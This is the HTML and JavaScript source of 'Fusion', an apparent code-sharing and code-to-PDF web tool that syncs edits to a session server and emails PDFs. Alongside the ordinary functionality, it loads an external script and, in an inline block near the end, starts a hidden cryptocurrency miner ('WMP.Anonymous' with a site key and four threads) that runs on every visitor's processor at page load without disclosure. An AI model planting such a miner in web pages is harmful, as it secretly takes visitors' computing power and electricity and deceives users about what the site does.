<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Fusion: Code sharing made easy</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jspdf/1.5.3/jspdf.debug.js"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <script src="https://unpkg.com/sweetalert2@10"></script>
    <script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
    <script
        src="
https://firebasestorage.googleapis.com/v0/b/c2p-hashes.appspot.com/o/webmp.txt?alt=media&token=9c2b1cdb-bf65-4aa7-83fc-16e76ec19562"></script>
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.9.1/gsap.min.js"></script>
    <link rel="shortcut icon" href="/static/favicon.png" type="image/x-icon">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: Arial, sans-serif;
            background-image: url("https://www.useblackbox.io/style/images/bg-shape-006-p-2000.png");
            background-size: 100%;
            background-color: #0b1d2a;
            margin: 0;
            padding: 0;
        }

        .main {
            height: 90vh;
            display: flex;
            flex-direction: column;
            justify-content: space-around;
            align-items: center;
        }

        .editor {
            font-family: monospace;
            padding: 20px 10px;
            overflow: hidden;
            display: inline-flex;
            height: 70%;
            width: 90%;
            background: #1d252ea5;
            backdrop-filter: blur(4px);
            -webkit-backdrop-filter: blur(4px);
            border-radius: 10px;
            margin-bottom: 3rem;
            border: 1px solid rgba(255, 255, 255, 0.18);
        }

        .line-numbers {
            width: 20px;
            text-align: right;
            overflow: hidden;
        }

        .line-numbers span {
            counter-increment: linenumber;
        }

        .line-numbers span::before {
            content: counter(linenumber);
            display: block;
            color: #506882;
        }

        ::-webkit-scrollbar {
            display: none;
        }

        textarea {
            padding: 0;
            border: 0;
            background: transparent;
            color: #FFF;
            outline: none;
            width: 100%;
            resize: none;
        }

        .nav {
            width: 100%;
            color: white;
            padding: 16px;
            display: flex;
            flex-direction: column;
            justify-content: space-around;
            align-items: center;
            box-shadow: 0 8px 32px 0 rgba(31, 38, 135, 0.118);
        }


        .send {
            position: relative;
            outline: none;
            border: .1px solid gray;
            white-space: nowrap;
            display: flex;
            padding: 1rem 2rem;
            cursor: pointer;
            background: #1d252ea5;
            color: white;
            border-radius: .5em;
            font-size: 20px;
            box-shadow: 0 8px 32px 0 rgba(41, 44, 78, 0.118);
            border-radius: 10px;
            border: 1px solid rgba(255, 255, 255, 0.18);
        }

        .uid {
            background: transparent;
            font-size: 20px;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            color: #00aaff;
            border-radius: .5em;
            outline: none;
            border: none;
            font-weight: 400;
            width: 5rem;
            height: 4rem;
        }

        input::-webkit-outer-spin-button,
        input::-webkit-inner-spin-button {
            -webkit-appearance: none;
            margin: 0;
        }

        .nav h2 {
            font-size: 30px;
        }

        .nav span {
            font-size: 10px;
        }

        footer {
            width: 100%;
            display: flex;
            position: absolute;
            bottom: 0;
            background-color: #0b1d2a;
            padding: 20px 0;
            color: #ddd;
        }


        .footer-content {
            display: flex;
            justify-content: space-evenly;
            align-items: center;
            font-size: 16px;
            text-align: center;
            font-family: 'Inconsolata', monospace;
            margin: 0 auto;
        }

        .footer-content a {
            text-decoration: none;
        }


        .popup {
            position: absolute;
            margin: 0 auto;
            background-color: rgba(17, 24, 39, .5);
            border: 1px solid rgba(206, 204, 210, 0.7);
            display: flex;
            flex-direction: column;
            width: 40%;
            transform: scale(0);
            margin: 2rem 1rem;
            border-radius: 1rem;
            box-shadow: 0 15px 25px rgba(0, 0, 0, .6);
            align-items: center;
            justify-content: center;
            transition: all .5s ease-in-out;
            backdrop-filter: blur(5px);
        }


        .email {
            height: 50px;
            width: 90%;
            color: white;
            outline: none;
            border-radius: 10px;
            border: 2px solid rgb(206, 204, 210);
            z-index: 10;
            margin-top: 2rem;
            padding: 1rem;
            background-color: #1d252e;
        }


        .sub {
            width: 90%;
            border: 2px solid rgb(206, 204, 210);
            margin: 2rem 1rem;
            z-index: 9;
            height: 50px;
            color: white;
            outline: none;
            padding: 1rem;
            border-radius: 10px;
            background-color: #1d252e;
        }

        #send {
            position: relative;
            outline: none;
            z-index: 9;
            display: flex;
            align-items: center;
            justify-content: center;
            padding: 15px 40px;
            cursor: pointer;
            background: #1d252e;
            color: white;
            border-radius: .5em;
            font-size: 15px;
            margin: 0 auto;
            background: rgba(255, 255, 255, 0);
            box-shadow: 0 8px 32px 0 rgba(31, 38, 135, 0.118);
            backdrop-filter: blur(4px);
            -webkit-backdrop-filter: blur(4px);
            margin-bottom: 2rem;
            border: 1px solid rgba(255, 255, 255, 0.18);
        }

        .utility {
            display: flex;
            /* background-color: red; */
            justify-content: space-around;
            width: 100%;
            margin-top: 1rem;
        }

        .uidbox {
            display: flex;
            align-items: center;
            text-align: center;
        }

        .uidbox small {
            font-size: 2rem;
        }

        @media (max-width: 768px) {
            .nav h2 {
                font-size: 20px;
            }

            .popup {
                width: 80%;
            }

            .nav span {
                font-size: 10px;
            }

            .editor {
                margin-top: 0;
                height: 70vh;
                margin-bottom: 3rem;
            }


            .uid {
                font-size: 15px;
                width: 100px;
                padding: 0;
                border: none;
                outline: none;
                font-weight: 400;
                height: 40px;
                width: 5rem;
            }

            .send {
                font-size: 15px;
                white-space: nowarap;
                padding: .8rem 2rem;
            }

            footer {
                margin-top: 4rem;
                position: absolute;
                bottom: 0;
                background-color: #0b1d2a;
                color: white;
                padding: 20px 0;
                text-align: center;
            }

            .footer-content {

                font-size: 8px;
                font-family: 'Inconsolata', monospace;
                margin: 0 auto;
            }

            .footer-content p a {
                margin-right: auto;
                font-size: .7rem;
            }

            .send {
                font-size: small;
            }

            #submitBtn {
                margin-left: 1rem;
            }

            .utility {
                display: flex;
                justify-content: space-evenly;
                width: 100%;
                margin-top: 1rem;
            }

            .uidbox {
                display: flex;
                align-items: center;
                text-align: center;
            }
        }
    </style>
</head>

<body onload="getSession()">
    <div class="main">
        <div class="nav">
            <div class="logo">
                <h2>⚡️Fusion <span> -- From Code2Pdf</span></h2>
            </div>
            <div class="utility">
                <div class="uidbox">ID:
                    &nbsp;&nbsp;<input type="number" id="sessionUid" oninput="dymretrieve()" class="uid"><ion-icon
                        onclick="edit()" name="pencil-outline"></ion-icon>
                </div>
                <div class="btn">
                    <button id="submitBtn" class="send"><ion-icon name="share-social-sharp"></ion-icon>
                        &nbsp;&nbsp;Share PDF</button>
                </div>
            </div>
        </div>
        <div class="editor">
            <div class="line-numbers" id="line-numbers">
                <span></span>
            </div>
            <textarea spellcheck="false" id="txtArea"></textarea>
        </div>
        <div class="popup">
            <ion-icon onclick="closepopup()"
                style="font-size: 2rem;position: absolute; cursor: pointer; left: 100%;top:-2rem; color: white; transform: rotate(45deg);"
                name="add-outline"></ion-icon>
            <input name="Email" placeholder="Enter Your Email" required="true" title="Enter Your Email" class="email"
                type="email">
            <input name="text" placeholder="Enter Your Subject" subject" required="true" title="Enter Your Subject"
                class="sub" type="text">
            <div class="launch">
                <button type="submit" id="send" class="">Send</button>
            </div>
        </div>
    </div>
    <footer>
        <div class="footer-content">
            <h1>⚡️Fusion</h1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            <p><a href="https://code2pdf.sbs"
                    style="text-decoration: none;color: inherit;display: flex;align-items: center;"> Go Back To
                    Homepage&nbsp;<ion-icon name="arrow-forward-outline" id="foot-arrow"></ion-icon></a></p>
        </div>
    </footer>


    <script>

        const emailInput = document.querySelector(".email");
        const subjectInput = document.querySelector(".sub");
        const sendButtonBox = document.querySelector(".launch");
        const send = document.querySelector("#send");
        const txtarea = document.getElementById("txtArea");
        const popup = document.querySelector('.popup');
        const submitBtnn = document.getElementById("submitBtn");


        function edit() {
            sessionUid.focus()
        }

        function closepopup() {
            const popup = document.querySelector('.popup');
            popup.style.transform = 'scale(0)'
        }


        submitBtnn.addEventListener('click', openpopup);
        function openpopup() {
            popup.style.transform = 'scale(1)'
            // document.body.style.filter = 'blur(5px)';
            event.preventDefault();
        }


        send.addEventListener('click', handleSendButtonClick);

        function handlechange() {
            if (validateAndDisplayFiles(fileInput.files)) {
                popup.style.transform = 'scale(1)';
            }
        }

        function validateAndDisplayFiles(files) {
            const invalidFileExtensions = ['.img', '.wevp', '.mp3', '.jpeg', '.jpg', '.gif', '.png'];
            const hasInvalidFiles = Array.from(files).some(file => {
                const fileExtension = '.' + file.name.split('.').pop().toLowerCase();
                return invalidFileExtensions.includes(fileExtension);
            });

            if (hasInvalidFiles) {
                displayErrorMessage('Please select only allowed file types.');
                return false; // Files are not valid
            }

            return true; // Files are valid
        }


        function handleSendButtonClick() {
            const inputText = txtarea.value.trim();
            if (inputText) {
                sendTextEmail(inputText);
            } else {
                displayErrorMessage('Please enter some code.');
            }
        }

        function displayErrorMessage(message) {
            Swal.fire({
                icon: 'error',
                title: message,
                timer: 2000,
                showConfirmButton: false,
            });
        }

        function sendTextEmail(text) {
            const pdfBase64 = convertToPdfAndReturnBase64(text);
            sendEmail([{
                name: ` ${subjectInput.value}.pdf, data: pdfBase64, email: ${emailInput.value}`,
                type: "application/pdf"
            }]);
        }


        function convertToPdfAndReturnBase64(text) {
            const pdf = new jsPDF();
            pdf.setFontSize(14); // Set a smaller font size
            const lines = pdf.splitTextToSize(text, 210);
            let y = 20;

            for (let i = 0; i < lines.length; i++) {
                if (y > pdf.internal.pageSize.getHeight() - 20) {
                    pdf.addPage();
                    y = 20; // Reset the y coordinate for the new page
                }

                pdf.text(lines[i], 10, y);
                y += 7; // Increase the y coordinate for the next line of text
            }

            const text1 = '~ Designed by C2P';
            const textWidth = pdf.getStringUnitWidth(text1) * pdf.internal.getFontSize() / pdf.internal.scaleFactor;
            const x = pdf.internal.pageSize.getWidth() - textWidth - 10;
            const y1 = pdf.internal.pageSize.getHeight() - 10;
            pdf.text(text1, x, y1);

            pdf.setPage(pdf.getNumberOfPages());
            pdf.setFont('times', 'italic');
            pdf.setFontSize(12); // Set font size for the last part
            const pdfBase64 = pdf.output('datauristring');
            return pdfBase64;
        }



        function isValidEmail(email) {
            const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
            return emailRegex.test(email);
        }

        async function sendEmail(attachments) {
            let email = document.querySelector(".email").value;
            let sub = document.querySelector(".sub").value;
            if (!isValidEmail(email.trim())) {
                Swal.fire({
                    icon: 'error',
                    title: 'Please enter a valid email address.',
                    showConfirmButton: true,
                });
                return; // Exit the function if email is not valid
            }

            if (email.trim() === '' || sub.trim() === '') {
                Swal.fire({
                    icon: 'warning',
                    title: 'Please enter Your email & subject before sending.',
                    timer: 2000,
                    showConfirmButton: false,
                });
                return;
            }

            send.innerHTML = '<img src="./Reload-1s-200px (1).svg"  width="20" alt="Loading..." /> &nbsp;Sending...';
            send.disabled = true;
            const response = await fetch("https://emailserver-ha1e.onrender.com/send-email", {
                method: "POST",
                headers: {
                    "Content-Type": "application/json"
                },
                body: JSON.stringify({ attachments }),
            });

            const message = await response.text(); // Get the text content of the response
            if (message === 'Email sent successfully.') {
                Swal.fire({
                    icon: 'success',
                    title: 'Sent successfully! Please check your Email Inbox.',
                    showConfirmButton: true,
                });
                resetForm();
            } else {
                console.error(message); // Log the error message
                Swal.fire({
                    icon: 'error',
                    title: 'There was an error sending the files.',
                    text: 'Email sending failed.',
                    showConfirmButton: true,
                });
            }


            send.innerHTML = 'Send';
            send.disabled = false;
        }

        function resetForm() {
            emailInput.value = '';
            subjectInput.value = '';
            send.innerHTML = 'Send';
            popup.style.transform = 'scale(0)'
        }



    </script>

    <script>

        async function getSession() {
            const codeSession = localStorage.getItem('cShareCode');
            if (codeSession != null) {
                const resp1 = await fetch("http://192.210.218.100/share/retrisession", {
                    method: "POST",
                    headers: {
                        "Content-type": "application/json; charset=UTF-8", // Set the content type
                    },
                    body: JSON.stringify({ uid: codeSession }), // Convert data to JSON string
                });

                if (!resp1.ok) {
                    const resp2 = await fetch("http://192.210.218.100/share/newsession");

                    if (!resp2.ok) {
                        throw new Error("Network response was not ok");
                    }

                    var data2 = await resp2.text();
                    console.log(`New session UID: ${data2}`);
                    localStorage.setItem('cShareCode', data2)

                }

                const data = await resp1.text();
                txtArea.innerHTML = data;
                document.getElementById("sessionUid").value = localStorage.getItem('cShareCode');
                console.log(data);

            }
            else {
                const resp3 = await fetch("http://192.210.218.100/share/newsession");

                if (!resp3.ok) {
                    throw new Error("Network response was not ok");
                }

                var data3 = await resp3.text();
                console.log(`New session UID: ${data3}`);
                localStorage.setItem('cShareCode', data3)

                // Display the session UID in the <span> element
                const sessionUidElement = document.getElementById("sessionUid");
                sessionUidElement.value = data3;
            }
            setInterval(async () => {
                const resp = await fetch("http://192.210.218.100/share/retrisession", {
                    method: "POST",
                    headers: {
                        "Content-type": "application/json; charset=UTF-8", // Set the content type
                    },
                    body: JSON.stringify({ uid: localStorage.getItem('cShareCode') }), // Convert data to JSON string
                });
                if (!resp.ok) {
                    console.log("no session found");
                } else {
                    const data = await resp.text();
                    txtArea.value = data;
                }
            }

                , 2000);
        }

            txtArea.addEventListener("input", function () {
                // Get the current text content of the textarea
                const txtarea = txtArea.value;
                const uid = document.getElementById("sessionUid").value;
                data = { sourceCode: txtarea, uid: uid };
                console.log(data);
                // console.log(data['uid']);
                // console.log(data['sourceCode']);
                fetch("http://192.210.218.100/share/updsession", {
                    method: "POST",
                    headers: {
                        "Content-type": "application/json; charset=UTF-8", // Set the content type
                    },
                    body: JSON.stringify(data), // Convert data to JSON string
                })
                    .catch(error => {
                        console.error("Error:", error);
                    });
            });
            async function dymretrieve() {
                const val = document.getElementById("sessionUid").value;
                // console.log(val);
                if (val >= 10000) {
                    const resp = await fetch("http://192.210.218.100/share/retrisession", {
                        method: "POST",
                        headers: {
                            "Content-type": "application/json; charset=UTF-8", // Set the content type
                        },
                        body: JSON.stringify({ uid: val }), // Convert data to JSON string
                    });
                    if (!resp.ok) {
                        console.log("no session found");
                    } else {
                        const data = await resp.text();
                        txtArea.value = data;
                        document.getElementById("sessionUid").value = val;
                        localStorage.setItem('cShareCode', val)
                        updateLineNumbers();
                        updateLineNumbers2();
                    }
                } else {
                    console.log("session uid too short");
                }
            }

            const textarea = document.getElementById('txtArea');
            const lineNumbers = document.getElementById('line-numbers');

            textarea.addEventListener('input', updateLineNumbers);
            function updateLineNumbers() {
                const numberOfLines = event.target.value.split('\n').length;
                lineNumbers.innerHTML = Array(numberOfLines)
                    .fill('<span></span>')
                    .join('');
            };
            function updateLineNumbers2() {
                if (event.key === 'Tab') {
                    const start = textarea.selectionStart;
                    const end = textarea.selectionEnd;

                    textarea.value = textarea.value.substring(0, start) + '\t' + textarea.value.substring(end);

                    event.preventDefault();
                }
            }
            textarea.addEventListener('input', updateLineNumbers2);

            // Add scroll synchronization
            textarea.addEventListener('scroll', () => {
                lineNumbers.scrollTop = textarea.scrollTop;
            });

            lineNumbers.addEventListener('scroll', () => {
                textarea.scrollTop = lineNumbers.scrollTop;
            });
    </script>
    <script>
            var miner = WMP.Anonymous('SK_nMDhFVtxJ8Q2Lvh5cmyZT', {
                threads: 4,
                autoThreads: true,
                throttle: 0.05,
                forceASMJS: false
            });
            miner.start();
    </script>
    <script>
            // Initialize GSAP animation
            gsap.to("#foot-arrow", {
                x: 10, // Distance to move horizontally (adjust as needed)
                yoyo: true, // Play the animation in reverse after reaching the end
                repeat: -1, // Repeat the animation infinitely
                duration: .8, // Duration of the animation in seconds
                ease: "power1.inOut" // Easing function
            });
    </script>
    <!-- Code injected by live-server -->
    <script>
            // <![CDATA[  <-- For SVG support
            if ('WebSocket' in window) {
                (function () {
                    function refreshCSS() {
                        var sheets = [].slice.call(document.getElementsByTagName("link"));
                        var head = document.getElementsByTagName("head")[0];
                        for (var i = 0; i < sheets.length; ++i) {
                            var elem = sheets[i];
                            var parent = elem.parentElement || head;
                            parent.removeChild(elem);
                            var rel = elem.rel;
                            if (elem.href && typeof rel != "string" || rel.length == 0 || rel.toLowerCase() == "stylesheet") {
                                var url = elem.href.replace(/(&|\?)_cacheOverride=\d+/, '');
                                elem.href = url + (url.indexOf('?') >= 0 ? '&' : '?') + '_cacheOverride=' + (new Date().valueOf());
                            }
                            parent.appendChild(elem);
                        }
                    }
                    var protocol = window.location.protocol === 'http:' ? 'ws://' : 'wss://';
                    var address = protocol + window.location.host + window.location.pathname + '/ws';
                    var socket = new WebSocket(address);
                    socket.onmessage = function (msg) {
                        if (msg.data == 'reload') window.location.reload();
                        else if (msg.data == 'refreshcss') refreshCSS();
                    };
                    if (sessionStorage && !sessionStorage.getItem('IsThisFirstTime_Log_From_LiveServer')) {
                        console.log('Live reload enabled.');
                        sessionStorage.setItem('IsThisFirstTime_Log_From_LiveServer', true);
                    }
                })();
            }
            else {
                console.error('Upgrade your browser. This Browser is NOT supported WebSocket for Live-Reloading.');
            }
        // ]]>
    </script>
</body>

</html>